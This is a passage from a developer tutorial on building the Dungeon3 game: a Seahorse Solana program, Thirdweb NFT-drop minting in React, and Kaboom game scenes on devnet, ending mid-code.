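raw = json.loads("[" + ", ".join(str(i % 256) for i in range(64)) + "]")
secret_seed, public_key_bytes = bytes(raw[:32]), bytes(raw[32:])
print(len(raw), len(secret_seed), len(public_key_bytes))  # 64 32 32
```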
We can check the address and balance with the respective keywords.
```text
solana address
```
and
```text
solana balance
```
To get a few SOL for testing, we use the airdrop command. Currently, the maximum per call is capped at 2 SOL. If we need more, we can call it several times.
```text
solana airdrop 2
```
We are not going to use the localnet, so make sure the RPC URL is set to devnet with:
```text
solana config set --url devnet
```
Run `cat` with the file path to display its content. We can copy-paste it to import it into Phantom Wallet. In this way, we don't use our main wallet.
```text
cat /Users/USERNAME/.config/solana/id.json
```
Now that we have setup our wallet, the next step is to create the program to store game data on the blockchain.
## The Program

### Introducing Seahorse
There are three frameworks we can use to create a Solana program: native Rust, Anchor, or the recently arrived Seahorse. Right now the most commonly used framework is Anchor, as you can see on GitHub and in the open-source repositories of the best-known protocols. Anchor abstracts away huge parts of the native workflow, but it still uses Rust.
Rust is known for slowing developers down: it has a steep learning curve, and its verbose code is slow to write and hard to read. Its complexity raises the barrier to entry for development, which slows things down and stunts innovation within the ecosystem.
Seahorse lets you write Solana programs in Python. It is a community-led project built on Anchor and fully interoperable with Rust code. It is not production ready, as it is still in beta, which means there are bugs and limitations. Nevertheless, we are going to explore its simplicity and its potential.
### Program breakdown
Head to [Solana Playground](https://beta.solpg.io/) and click on the plus sign to create a new project. Give it the name `dungeon3`, select the last option, Seahorse (Python), and press the create button. Change the name of `fizzbuzz.py` to `dungeon.py` and paste the following code.
```python
# dungeon3
# Built with Seahorse v0.2.1
from seahorse.prelude import *
# This is your program's public key and it will update
# automatically when you build the project.
declare_id('11111111111111111111111111111111');
class UserAccount(Account):
authority: Pubkey
score: u64
map: u8
health: u8
class ItemAccount(Account):
authority: Pubkey
id: u8
quantity: u64
exports: u8
@instruction
def init_user(authority: Signer, new_user_account: Empty[UserAccount]):
user_account = new_user_account.init(
payer=authority, seeds=['user', authority])
user_account.authority = authority.key()
user_account.score = 0
user_account.map = 0
user_account.health = 0
@instruction
def init_item(authority: Signer, new_item_account: Empty[ItemAccount], id: u8):
item_account = new_item_account.init(
payer=authority, seeds=['item', authority, id])
item_account.authority = authority.key()
item_account.id = id
item_account.quantity = 0
item_account.exports = 0
@instruction
def set_user(authority: Signer, user_account: UserAccount, score: u64, map: u8, health: u8):
assert authority.key() == user_account.authority, "signer must be user account authority"
user_account.score = score
user_account.map = map
user_account.health = health
@instruction
def add_item(authority: Signer, item_account: ItemAccount):
assert authority.key() == item_account.authority, "signer must be user account authority"
item_account.quantity = item_account.quantity + 1
@instruction
def export_items(authority: Signer, item_account: ItemAccount):
assert authority.key() == item_account.authority, "signer must be user account authority"
item_account.quantity = 0
item_account.exports = item_account.exports + 1
```
Let's see what we are doing here. The first line imports class and function definitions to provide editors with autocompletion and serve as documentation.
```python
from seahorse.prelude import *
```
`Declare_id` is the program's public key.
```python
# This is your program's public key and it will update
# automatically when you build the project.
declare_id('11111111111111111111111111111111');
```
We derive from the base `Account` type to create program accounts. We define two accounts: `UserAccount` stores the user's progress, and `ItemAccount` records user items that can be exported as NFTs.
```python
class UserAccount(Account):
authority: Pubkey
score: u64
map: u8
health: u8
```
With the @instruction decorator, we convert a function into an instruction. If you have used Anchor, you know that accounts are separated out into an account context struct. In Seahorse there is no account context: the parameters of an instruction can include both accounts and regular parameters.
We pass in a Signer, the wallet that signed the transaction containing this instruction call. It is often used as an account payer or as a seed.
For the second account, `new_user_account`, we wrap the account type with `Empty` to indicate that it will be initialized by this instruction. The `payer` indicates who pays the rent. On Solana, every account pays a fee for the space allocated for its data; an account is rent exempt if it is initialized with an amount equal to or greater than two years of rent. That amount is recoverable if we close the account, but that is out of scope for this tutorial. The seeds let us derive the account address deterministically. Once the account is initialized, we set the default values.
```python
@instruction
def init_user(authority: Signer, new_user_account: Empty[UserAccount]):
user_account = new_user_account.init(
payer=authority, seeds=['user', authority])
user_account.authority = authority.key()
user_account.score = 0
user_account.map = 0
user_account.health = 0
```
Switch to the second tab in Solana Playground. Make a copy of your address and fund it.

```text
$ solana airdrop 2 <YOUR_ADDRESS>
```
Click on build and then on deploy to send the program to the devnet. Open "Program Credentials" and copy the program ID. Save it somewhere as it is required as an environment variable for the frontend.

Now it is time to test the program.
### Testing
In the third tab, we can play around with the program. It is divided into two sections: Instructions and Accounts. In the first section, you can call all the available functions by passing the required accounts and arguments. In the second section, you can fetch the accounts data.

We can also automate the testing with a test file that you can find under the Client section back in the file explorer tab.

You can try to write your own tests first. It is pretty straightforward. The editor comes with autocompletion, which helps us to understand what we can use. There is already an example there from the fizzbuzz program. Otherwise, you can paste mine.
```ts
// No imports needed: web3, anchor, pg and more are globally available
describe("Test", async () => {
// Generate the account public key from its seeds
const [userAccountAddress] = await web3.PublicKey.findProgramAddress(
[Buffer.from("user"), pg.wallet.publicKey.toBuffer()],
pg.PROGRAM_ID
);
it("init user", async () => {
// Send transaction
const txHash = await pg.program.methods
.initUser()
.accounts({
newUserAccount: userAccountAddress,
})
.rpc();
console.log(`Use 'solana confirm -v ${txHash}' to see the logs`);
// Confirm transaction
await pg.connection.confirmTransaction(txHash);
// Fetch the account
const userAccount = await pg.program.account.userAccount.fetch(
userAccountAddress
);
console.log("Score: ", userAccount.score.toString());
console.log("Health: ", userAccount.health);
});
it("set user", async () => {
// Send transaction
const txHash = await pg.program.methods
.setUser(new BN(15000), 0, 1)
.accounts({
userAccount: userAccountAddress,
})
.rpc();
console.log(`Use 'solana confirm -v ${txHash}' to see the logs`);
// Confirm transaction
await pg.connection.confirmTransaction(txHash);
// Fetch the account
const userAccount = await pg.program.account.userAccount.fetch(
userAccountAddress
);
console.log("Score: ", userAccount.score.toString());
console.log("Health: ", userAccount.health);
});
});
```
`userAccountAddress` is a PDA, or program derived address, generated from the seeds we passed when we initialized the account. PDAs do not have private keys, so only the owning program can sign for them, which lets them live securely on-chain.
First we invoke the initUser method. No arguments are passed to initUser(). Then we pass the accounts that the instruction will interact with, in this case the user account address. Notice that authority, `systemProgram`, and rent are also accounts the instruction interacts with, and therefore required, yet we omitted them without a problem. That is because they are accounts that Anchor can infer, so they are optional.
```ts
const txHash = await pg.program.methods
.initUser()
.accounts({
// authority: pg.wallet.publicKey,
newUserAccount: userAccountAddress,
// systemProgram: new PublicKey("11111111111111111111111111111111"),
// rent: new PublicKey("SysvarRent111111111111111111111111111111111")
})
.rpc();
```
On the next line, we wait for confirmation that the transaction has been successfully finalized. Therefore, we are waiting for the account to be successfully created and updated with the default values.
```ts
await pg.connection.confirmTransaction(txHash);
```
Once it is confirmed, we can fetch the account data and log the result.
```ts
const userAccount = await pg.program.account.userAccount.fetch(
userAccountAddress
);
console.log("Score: ", userAccount.score.toString());
console.log("Health: ", userAccount.health);
```
This will be useful later when we implement contract calls from the frontend with the Thirdweb Solana SDK. As stated at the beginning of the overview, we also want users to mint a free NFT to get access to the game. To do that, we will create an NFT Collection Drop so people can claim it.
## The Collection

### Generate the PNGs
Players are required to hold our NFT to play the game, and the NFTs need to be claimable. To achieve this, we will use the Thirdweb NFT Drop program. The first step is to create the layers of the design. The most popular tools are Photoshop, Illustrator, or Figma. For this tutorial you can use mine, which you can copy from my [figma file](https://www.figma.com/community/file/1166287637845780926) and change as you wish, or use the exported PNGs from the `art_layers` folder.

To combine the layers, we will use the HashLips art engine. To make things easier, we are going to use the modified version by Waren Gonzaga, adapted for Thirdweb. Clone the repository with:
```text
git clone https://github.com/warengonzaga/thirdweb-art-engine.git
```
Remove all the folders inside the `layers` folder and put the folders of our art in there. Open the config file under the `src` folder. Change the `namePrefix` and `description` of your collection. Update `layersOrder` to point at the folders you placed inside the `layers` folder, and set `growEditionSizeTo` to the number of PNGs you want to generate.
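As a rough sketch, the relevant fields in `src/config.js` look something like this (the values and layer names below are illustrative assumptions; yours will match your own folders):

```js
// src/config.js (excerpt) -- illustrative values only
const namePrefix = "Dungeon3";            // collection name prefix shown on each NFT
const description = "Heroes of Dungeon3"; // collection description
const layerConfigurations = [
  {
    growEditionSizeTo: 100, // total number of PNGs to generate
    layersOrder: [
      // bottom layer first, top layer last; names must match your folders
      { name: "Background" },
      { name: "Body" },
      { name: "Weapon" },
    ],
  },
];
```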
Use yarn to install the dependencies and run:
```text
yarn generate && yarn generate_thirdweb
```
to generate the art and create a folder for thirdweb.
### Setup wallet
Install the Phantom Wallet Chrome extension from here: [https://phantom.app/](https://phantom.app/). Create a new wallet by following the instructions indicated by Phantom. It is very important to keep the 12-word recovery phrase safe. Switch to DEVNET.

If you intend to use this wallet directly, you can copy your wallet address and open the terminal to run the solana cli to airdrop yourself 2 SOL.
```text
solana airdrop 2 WALLET_ADDRESS
```
What I did instead was import a second wallet, generated from the terminal as shown in the setup section above. That keeps the wallet where I hold real assets separate from the one used only for testing, which is safer. Find the keypair JSON file by running:
```text
$ solana config get
...
Keypair Path: /Users/USERNAME/.config/solana/id.json
```
To open the path, hold down the Cmd or Ctrl key and click on it. You can also access the file by going to the path with your file explorer. The content looks like this: `[12, 21, 45]`. In the Phantom Wallet, click on the icon and then on your wallet name. Click on Add/Connect Wallet -> Import private key and paste it there to import.
### Deploy and upload
Head to the Thirdweb Dashboard at [https://thirdweb.com/dashboard](https://thirdweb.com/dashboard). Connect your Phantom Wallet. Click on the Deploy New Program button and choose the NFT Drop. Give it a name, Dungeon3 in my case. Set the Total Supply to the number of NFTs we generated. Switch the network to devnet and click on Deploy Now.

Use Batch Upload, drag and drop the folder generated with the Hashlips engine, or click to select files.

You need to upload all of your NFTs, matching the drop supply set when deploying the program. Set your claim conditions to enable users to start claiming them. In the claim conditions tab, we can change the drop start, the royalties, and how much to charge. I set the total number of NFTs that can be claimed to the maximum supply and left the rest as is. Then click on Save claim conditions.
## The Mint page

### Getting started
Set the environment variables. The variables required can be found in `.env.example`.
- The program ID comes from the program we deployed at the beginning.
- The collection address can be copied from the Thirdweb Dashboard, more specifically the nft drop that we have created for the collection.
- The RPC URL. You can obtain one by creating an Alchemy account and then creating an app; the URL can be copied from the dashboard.
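Since this is a Vite project, those variables typically reach the app through `import.meta.env` with a `VITE_` prefix. A hedged sketch of what `utils/constants.ts` might read (the exact variable names are assumptions, check `.env.example`):

```ts
// utils/constants.ts (sketch) -- variable names are assumptions
import { PublicKey } from "@solana/web3.js";

export const PROGRAM_ID = new PublicKey(import.meta.env.VITE_PROGRAM_ID);
export const TW_COLLECTION_ADDRESS = import.meta.env.VITE_COLLECTION_ADDRESS;
export const NETWORK_URL = import.meta.env.VITE_RPC_URL; // e.g. your Alchemy devnet URL
```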
The project started with pnpm. The commands are the same for npm and yarn. To install the dependencies, run
```
pnpm install
```
and start the project locally with
```
pnpm dev
```
### Router
We want users to mint an NFT from the collection to be able to play the game. With the help of `react-router-dom`, we create two pages with React. The mint page checks for the user's NFT; if the user does not have one yet, we allow them to mint one. The user connects with the Phantom wallet and mints a free NFT. Once it is minted, the user can play the game.
Create the router in `main.tsx` with `createBrowserRouter` and pass the router to the `RouterProvider`.
```tsx
import "@solana/wallet-adapter-react-ui/styles.css";
import React from "react";
import ReactDOM from "react-dom/client";
import { createBrowserRouter, RouterProvider } from "react-router-dom";
import App from "./App";
import { ContextProvider } from "./contexts/ContextProvider";
import MintPage from "./MintPage";
import "./styles/globals.css";
const router = createBrowserRouter([
{
path: "/",
element: <App />,
},
{
path: "mint",
element: <MintPage />,
},
]);
ReactDOM.createRoot(document.getElementById("root") as HTMLElement).render(
<React.StrictMode>
<ContextProvider>
<RouterProvider router={router} />
</ContextProvider>
</React.StrictMode>
);
```
The path mint takes the user to the mint page `MintPage.tsx`.
```ts
import MintPage from "./MintPage";
// ...
{
path: "mint",
element: <MintPage />,
},
```
It should be running at http://127.0.0.1:5173/mint
### Mint NFT
The `MintPage.tsx`:
```tsx
import { useWallet } from "@solana/wallet-adapter-react";
import { WalletMultiButton } from "@solana/wallet-adapter-react-ui";
import "@solana/wallet-adapter-react-ui/styles.css";
import { useEffect } from "react";
import { useNavigate } from "react-router-dom";
import useProgram from "./hooks/anchor";
import useTw from "./hooks/tw";
export default function MintPage() {
const { publicKey } = useWallet();
const navigate = useNavigate();
const { nftDrop, hasNft } = useTw();
const { initUserAnchor } = useProgram();
/**
* Check if the wallet has NFT
* Go to the game page if we find it.
*/
useEffect(() => {
if (hasNft === 1) {
navigate("/");
}
}, [hasNft]);
const mint = async () => {
if (!nftDrop || !publicKey) return;
try {
// Claim 1 NFT
const claimedAddresses = await nftDrop.claim(1);
console.log("Claimed NFT to: ", claimedAddresses[0]);
// Initialize user account
await initUserAnchor();
navigate("/");
} catch (error) {
alert("something went wrong :(");
}
};
return (
<>
<div className="flex justify-around">
<div className="self-center">
<h2 className="font-bold">Dungeon3</h2>
</div>
<WalletMultiButton className="btn btn-primary" />
</div>
<div className="h-screen">
<div className="flex flex-col gap-3 h-[inherit] items-center justify-center">
<h2 className="font-bold">Dungeon3</h2>
<img src="/hero.png" alt="dungeon3" className="w-60" />
<span>Mint your Hero</span>
<button className="btn btn-primary" onClick={mint}>
Mint
</button>
</div>
</div>
</>
);
}
```
The player can connect the wallet to the Solana blockchain thanks to the wallet button component.
```html
<WalletMultiButton className="btn btn-primary" />
```
Then we have another button which allows the user to mint an NFT.
```html
<button className="btn btn-primary" onClick={mint}>Mint</button>
```
The page will check if the user has an NFT of the collection first.
```ts
/**
* Check if the wallet has NFT
* Go to the game page if we find it.
*/
useEffect(() => {
if (hasNft === 1) {
navigate("/");
}
}, [hasNft]);
```
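Note that `hasNft` is a tri-state value rather than a boolean: `-1` while the check is still running, `0` for a confirmed "no NFT", and `1` for "NFT found". A minimal sketch of why that matters for the redirects (hypothetical helpers, not in the repo):

```ts
// -1 = still loading, 0 = no NFT, 1 = has NFT
type HasNft = -1 | 0 | 1;

// Only enter the game once we know for sure the wallet owns an NFT.
function shouldEnterGame(hasNft: HasNft): boolean {
  return hasNft === 1;
}

// Only send the player to the mint page on a confirmed "no",
// never while the lookup is still in flight.
function shouldGoToMint(hasNft: HasNft): boolean {
  return hasNft === 0;
}
```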
The mint function calls the `nftDrop` property from the `useTw()` hook
```ts
const { nftDrop } = useTw();
// ...
const mint = async () => {
if (!publicKey || !nftDrop) return;
try {
// Claim 1 NFT
const claimedAddresses = await nftDrop.claim(1);
console.log("Claimed NFT to: ", claimedAddresses[0]);
// Initialize user account
await initUserAnchor();
navigate("/");
} catch (error) {
alert("something went wrong :(");
}
};
```
The `nftDrop` is initiated by the Thirdweb SDK. The SDK is initialized when the user connects the wallet.
```ts
import { NETWORK_URL, TW_COLLECTION_ADDRESS } from "@/utils/constants";
import { useWallet } from "@solana/wallet-adapter-react";
import "@solana/wallet-adapter-react-ui/styles.css";
import { NFTDrop, ThirdwebSDK } from "@thirdweb-dev/sdk/solana";
import { useEffect, useMemo, useState } from "react";
export default function useTw() {
const wallet = useWallet();
const { publicKey } = wallet;
const [nftDrop, setNftDrop] = useState<NFTDrop>();
const [hasNft, setHasNft] = useState(-1);
// Initialize sdk with wallet when wallet is connected
const sdk = useMemo(() => {
if (publicKey) {
const sdk = ThirdwebSDK.fromNetwork(NETWORK_URL);
sdk.wallet.connect(wallet);
return sdk;
}
}, [publicKey]);
// Initialize collection drop program when sdk is defined
useEffect(() => {
async function load() {
if (sdk) {
const nftDrop = await sdk.getNFTDrop(TW_COLLECTION_ADDRESS);
setNftDrop(nftDrop);
}
}
load();
}, [sdk]);
useEffect(() => {
async function getHasNft() {
try {
if (publicKey !== null && nftDrop !== undefined) {
const nfts = await nftDrop.getAllClaimed();
const userAddress = publicKey.toBase58();
const hasNFT = nfts.some((nft) => nft.owner === userAddress);
// some() returns a boolean, so check it directly
if (hasNFT) {
  setHasNft(1);
} else {
  setHasNft(0);
}
}
} catch (error) {
console.error(error);
}
}
getHasNft();
}, [publicKey, nftDrop]);
return {
sdk,
nftDrop,
hasNft,
};
}
```
When the app gets the user's wallet address, the hook instantiates the Thirdweb SDK and gets the NFT drop. It then uses it to check whether the user owns an NFT of the collection with `getHasNft()`.
```ts
if (publicKey !== null && nftDrop !== undefined) {
const nfts = await nftDrop.getAllClaimed();
const userAddress = publicKey.toBase58();
const hasNFT = nfts.some((nft) => nft.owner === userAddress);
// some() returns a boolean, so check it directly
if (hasNFT) {
  setHasNft(1);
} else {
  setHasNft(0);
}
}
```
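The ownership test itself is just an `Array.some` over the claimed NFTs. Extracted as a pure function (a hypothetical helper for illustration), it is easy to reason about:

```ts
interface ClaimedNft {
  owner: string; // base58 wallet address of the current owner
}

// True if any claimed NFT in the drop belongs to the given address.
function ownsCollectionNft(nfts: ClaimedNft[], address: string): boolean {
  return nfts.some((nft) => nft.owner === address);
}
```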
We also called `initUserAnchor()` when we called the mint function.
### Initiate user account
`initUserAnchor()` is imported from `hooks/anchor.ts`. We use the Solana SDK to get the Anchor program. The code should look familiar: it is the code we used for testing the program, with tiny changes.
```ts
import { PROGRAM_ID } from "@/utils/constants";
import { Dungeon3, IDL } from "@/utils/idl";
import { BN, Program } from "@project-serum/anchor";
import { useWallet } from "@solana/wallet-adapter-react";
import "@solana/wallet-adapter-react-ui/styles.css";
import { PublicKey } from "@solana/web3.js";
import { useEffect, useState } from "react";
import useTw from "./tw";
export type SetUserAnchor = (
score: number,
health: number
) => Promise<string | undefined>;
export default function useProgram() {
const wallet = useWallet();
const { sdk } = useTw();
const [program, setProgram] = useState<Program<Dungeon3>>();
useEffect(() => {
// Load program when sdk is defined
load();
async function load() {
if (sdk) {
const { program }: { program: Program<Dungeon3> } =
(await sdk.getProgram(PROGRAM_ID.toBase58(), IDL)) as any;
setProgram(program);
}
}
}, [sdk]);
const initUserAnchor = async () => {
try {
if (!program || !wallet.publicKey) return;
// Find user account. PDA
const [userAccountAddress] = await PublicKey.findProgramAddress(
[Buffer.from("user"), wallet.publicKey.toBuffer()],
PROGRAM_ID
);
// Send transaction
const txHash = await program.methods
.initUser()
.accounts({
newUserAccount: userAccountAddress,
})
.rpc();
console.log(`Use 'solana confirm -v ${txHash}' to see the logs`);
return txHash;
} catch (error) {
console.error(error);
return undefined;
}
};
const setUserAnchor = async (score: number, health: number) => {
try {
if (!program || !wallet.publicKey) return;
// Find user account. PDA
const [userAccountAddress] = await PublicKey.findProgramAddress(
[Buffer.from("user"), wallet.publicKey.toBuffer()],
PROGRAM_ID
);
// Send transaction
const txHash = await program.methods
.setUser(new BN(score), 0, health)
.accounts({
userAccount: userAccountAddress,
authority: wallet.publicKey,
})
.rpc();
console.log(`Use 'solana confirm -v ${txHash}' to see the logs`);
return txHash;
} catch (error) {
console.error(error);
return undefined;
}
};
return {
program,
initUserAnchor,
setUserAnchor,
};
}
```
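Both functions derive the same PDA the on-chain program expects: the literal string `"user"` plus the wallet's 32-byte public key. A sketch of just the seed construction (the helper below is hypothetical and skips the `@solana/web3.js` dependency for clarity):

```ts
// Build the seed byte arrays passed to PublicKey.findProgramAddress.
function userPdaSeeds(walletKeyBytes: Uint8Array): Uint8Array[] {
  const label = new TextEncoder().encode("user"); // matches the seed used in the program
  return [label, walletKeyBytes];
}
```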
## The Game

### Introduction
Kaboom is a JavaScript game programming library that helps you make games quickly and have fun doing it. We initiate Kaboom in `App.tsx` and pass the context down to the Kaboom components.
All the game's static assets are located inside the `assets` folder. The `sounds` folder contains the MP3 and WAV files that play on player actions. The main PNGs are located in the `dungeon.png` file. The `dungeon.json` file defines the pixel regions we want to extract from `dungeon.png` and defines the animations.
During development, I encountered a `class extends value undefined is not a constructor or null` issue.
> Note:
> Polyfill issue. Some dependencies of the Metaplex SDK still rely on Node.js features that are not available in the browser by default. We install some polyfills via Rollup plugins, since Vite uses Rollup under the hood to bundle for production. The Thirdweb Solana SDK is built on top of Metaplex, which means Metaplex issues are reflected here as well. [Learn more about the issue](https://github.com/metaplex-foundation/js/issues/343)
This repository has the polyfills installed, but if you start a new project with create-react-app or Vite, keep in mind that the polyfills are required.
### Initiate and load assets
Let's break down the game, starting from the `App.tsx` file.
```ts
import { loadKaboom } from "@/components/kaboom";
import { WalletMultiButton } from "@solana/wallet-adapter-react-ui";
import "@solana/wallet-adapter-react-ui/styles.css";
import kaboom from "kaboom";
import { useEffect, useRef } from "react";
import { useNavigate } from "react-router-dom";
import useProgram from "./hooks/anchor";
import useTw from "./hooks/tw";
export default function Home() {
const { hasNft } = useTw();
const navigate = useNavigate();
const { setUserAnchor, program } = useProgram();
// Check if the user has the nft.
// Go to the mint page if the user hasn't.
useEffect(() => {
if (hasNft === 0) {
navigate("/mint");
}
}, [hasNft]);
// Get the canvas where we are going to load the game.
const canvasRef = useRef(
document.getElementById("canvas") as HTMLCanvasElement
);
useEffect(() => {
// Start kaboom with configuration
const k = kaboom({
global: false,
width: 640,
height: 480,
stretch: true,
letterbox: true,
canvas: canvasRef.current,
background: [0, 0, 0],
});
loadKaboom(k, setUserAnchor);
}, [program]);
return (
<>
<div className="flex justify-around">
<div className="self-center">
<h2 className="font-bold">Dungeon3</h2>
</div>
<WalletMultiButton className="btn btn-primary" />
</div>
<canvas
id="canvas"
width={window.innerWidth - 160}
height={window.innerHeight - 160}
ref={canvasRef}
></canvas>
</>
);
}
```
When the page is loaded, we create a new instance of Kaboom inside `useEffect`. We set the canvas to stretch to fit the container while keeping the width-to-height ratio.
```ts
const k = kaboom({
global: false,
width: 640,
height: 480,
stretch: true,
letterbox: true,
canvas: canvasRef.current,
background: [0, 0, 0],
});
```
Get the element with the id `canvas` as a reference. This allows React to render the game inside the canvas element. The 160px offset acts as a margin to the borders.
```ts
const canvasRef = useRef(
document.getElementById("canvas") as HTMLCanvasElement
);
// ... inside return
<canvas
id="canvas"
width={window.innerWidth - 160}
height={window.innerHeight - 160}
ref={canvasRef}
></canvas>;
```
We pass down the kaboom context.
```ts
import { loadKaboom } from "@/components/kaboom";
// ... k = Kaboom Context
loadKaboom(k, setUserAnchor);
```
Inside `kaboom/index.ts` we have:
```ts
import { SetUserAnchor } from "@/hooks/anchor";
import { KaboomCtx } from "kaboom";
import { OLDMAN, OLDMAN2, OLDMAN3 } from "../../utils/constants";
import { Game } from "./game";
import { Home } from "./home";
export const loadKaboom = (k: KaboomCtx, setUserAnchor: SetUserAnchor) => {
const { go, loadSpriteAtlas, loadSound, loadSprite, play, scene } = k;
/**
* Load Sprites and Sounds
*/
loadSpriteAtlas("/assets/dungeon.png", "/assets/dungeon.json");
loadSprite(OLDMAN, "/assets/OldMan/SeparateAnim/Idle.png", {
sliceX: 4,
sliceY: 1,
anims: {
idle: {
from: 0,
to: 3,
},
},
});
loadSprite(OLDMAN2, "/assets/OldMan2/SeparateAnim/Idle.png", {
sliceX: 4,
sliceY: 1,
anims: {
idle: {
from: 0,
to: 3,
},
},
});
loadSprite(OLDMAN3, "/assets/OldMan3/SeparateAnim/Idle.png", {
sliceX: 4,
sliceY: 1,
anims: {
idle: {
from: 0,
to: 3,
},
},
});
loadSound("coin", "/assets/sounds/coin.wav");
loadSound("hit", "/assets/sounds/hit.mp3");
loadSound("wooosh", "/assets/sounds/wooosh.mp3");
loadSound("kill", "/assets/sounds/kill.wav");
loadSound("dungeon", "/assets/sounds/dungeon.ogg");
const music = play("dungeon", {
volume: 0.2,
loop: true,
});
scene("home", () => Home(k));
scene("game", () => Game(k, setUserAnchor));
function start() {
// Start with the "game" scene, with initial parameters
go("home", {});
}
start();
};
```
We destructure all the functions we need on the first line, so we don't have to go through the context every time we invoke one of them.
```ts
const { go, loadSpriteAtlas, loadSound, loadSprite, play, scene } = k;
```
We load the sprites and sounds. If you are wondering what a sprite is: sprites are images that represent game assets.
```ts
/**
* Load Sprites and Sounds
*/
loadSpriteAtlas("/assets/dungeon.png", "/assets/dungeon.json");
loadSprite(OLDMAN, "/assets/OldMan/SeparateAnim/Idle.png", {
sliceX: 4,
sliceY: 1,
anims: {
idle: {
from: 0,
to: 3,
},
},
});
// ...
loadSound("coin", "/assets/sounds/coin.wav");
loadSound("hit", "/assets/sounds/hit.mp3");
loadSound("wooosh", "/assets/sounds/wooosh.mp3");
loadSound("kill", "/assets/sounds/kill.wav");
loadSound("dungeon", "/assets/sounds/dungeon.ogg");
const music = play("dungeon", {
volume: 0.2,
loop: true,
});
```
`loadSpriteAtlas` loads a single PNG file that aggregates several images, which is why we also have to pass in a JSON file describing how to extract each piece: `width` and `height` define its size, `x` and `y` its coordinates, and `sliceX` and `anims` its frames and animation configuration.
```json
"coin": {
"x": 288,
"y": 272,
"width": 32,
"height": 8,
"sliceX": 4,
"anims": {
"spin": {
"from": 0,
"to": 3,
"speed": 10,
"loop": true
}
}
},
```
For `loadSprite`, we can pass the animation configuration in as the third parameter. Then we have `loadSound`, which loads a sound with a name and a resource URL.
```ts
loadSound("coin", "/assets/sounds/coin.wav");
```
Once an asset is loaded, we can use it by calling it by the name we gave to it.
```ts
loadSound("dungeon", "/assets/sounds/dungeon.ogg");
play("dungeon", {
volume: 0.2,
loop: true,
});
```
Create two scenes. The Home component contains a menu that allows the user to start a new game. We show the Home scene first by calling the `start()` function.
```ts
scene("home", () => Home(k));
scene("game", () => Game(k, setUserAnchor));
function start() {
// Start with the "game" scene, with initial parameters
go("home", {});
}
start();
```
### Map, characters, items and logics
The Home component has mostly the same elements that we are going to cover in the Game component, so let's move to the `game.ts` file directly.
Let's create the map for the game. Most game engines come with a visual editor that lets us drag and drop items into the scene. Kaboom works a bit differently: we write the map in code. `addLevel` requires two parameters. In the first parameter, we define where we want to place the game assets using symbols; you can use any symbols you like, plus numbers and upper- and lowercase letters. In the second parameter, we define the tile size and associate each symbol with the sprite it stands for. The symbols work like HTML tags, and mapping a sprite to a symbol is like adding CSS styles to the tag.
```ts
/**
* Map
*/
// map floor
addLevel(
[
"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
],
{
width: 16,
height: 16,
" ": () => [sprite("floor", { frame: ~~rand(0, 8) })],
}
);
// map walls, enemies, items, coins...
const map = addLevel(
[
" ",
"tttttttttttttttttttttttttttttttttttttttt",
"qwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwd",
"l r",
"l $ r",
"l r",
"l ccc ccc ccc ccc r",
"l r",
"l ccc ccc ccc r",
"4ttttttttttttttttttttttttttttttttttttt r",
"ewwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww r",
"l r",
"l c r",
"l ccccccccc r",
"l c r",
"l r",
"l r",
"4ttttttttttttttttttttttttttttttttttttttr",
"ewwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwr",
"l r",
"l cccccccccccccccccccccccccccccccc r",
"l r",
"l cccccccccccccccccccccccccccccccc r",
"l r",
"l r",
"attttttttttttttttttttttttttttttttttttttb",
"wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww",
],
{
width: 16,
height: 16,
$: () => [sprite("chest"), area(), solid(), { opened: false }, "chest"],
c: () => [sprite("coin", { anim: "spin" }), area(), "coin"],
a: () => [sprite("wall_botleft"), area({ width: 4 }), solid()],
b: () => [
sprite("wall_botright"),
area({ width: 4, offset: vec2(12, 0) }),
solid(),
],
q: () => [sprite("wall_topleft"), area(), solid()],
4: () => [sprite("wall_topmidleft"), area(), solid()],
e: () => [sprite("wall_midleft"), area(), solid()],
d: () => [sprite("wall_topright"), area(), solid()],
w: () => [sprite("wall"), area(), solid()],
t: () => [
sprite("wall_top"),
area({ height: 4, offset: vec2(0, 12) }),
solid(),
],
l: () => [sprite("wall_left"), area({ width: 4 }), solid()],
r: () => [
sprite("wall_right"),
area({ width: 4, offset: vec2(12, 0) }),
solid(),
],
}
);
```
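Because the level is just an array of strings, it can be inspected like any other data. For instance, counting how many coins the layout defines (a hypothetical helper, handy for sanity checks):

```ts
// Count how many times a symbol appears in a level layout.
function countSymbol(layout: string[], symbol: string): number {
  let count = 0;
  for (const row of layout) {
    for (const ch of row) {
      if (ch === symbol) count++;
    }
  }
  return count;
}
```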
With the `add` function, we assemble a game object from a list of components and add it to the game. The `pos` component positions the object on the map. `sprite` takes the id of a loaded sprite; with `loadSpriteAtlas` we defined all the ids in the JSON file. The `area` component defines the collision area and enables collision detection with other objects. This allows us, for example, to increase the player's coins when the player touches a coin. We also used it for the walls and enemies so the player can't walk through them like a ghost.
```ts
/**
* Sprites
*/
const player = add([
pos(map.getPos(11, 11)),
sprite(HERO, { anim: "idle" }),
area({ width: 12, height: 12, offset: vec2(0, 6) }),
solid(),
origin("center"),
]);
const sword = add([
pos(),
sprite(SWORD),
origin("bot"),
rotate(0),
follow(player, vec2(-4, 9)),
area(),
spin(),
]);
const oldman = add([
OLDMAN,
sprite(OLDMAN),
pos(map.getPos(30, 12)),
origin("bot"),
area(),
solid(),
{ msg: "Save progress?" },
]);
const oldman2 = add([
OLDMAN2,
sprite(OLDMAN2),
pos(map.getPos(8, 20)),
origin("bot"),
area(),
solid(),
{ msg: "Save progress?" },
]);
const oldman3 = add([
OLDMAN3,
sprite(OLDMAN3),
pos(map.getPos(8, 4)),
origin("bot"),
area(),
solid(),
{ msg: "Save progress?" },
]);
const ogre = add([
"ogre",
sprite("ogre"),
pos(map.getPos(6, 14)),
origin("bot"),
area({ scale: 0.5 }),
solid(),
]);
const monster = add([
"monster",
sprite("monster", { anim: "run" }),
pos(map.getPos(4, 7)),
origin("bot"),
patrol(100),
area({ scale: 0.5 }),
solid(),
]);
const monster2 = add([
"monster",
sprite("monster", { anim: "run" }),
pos(map.getPos(24, 9)),
origin("bot"),
patrol(100),
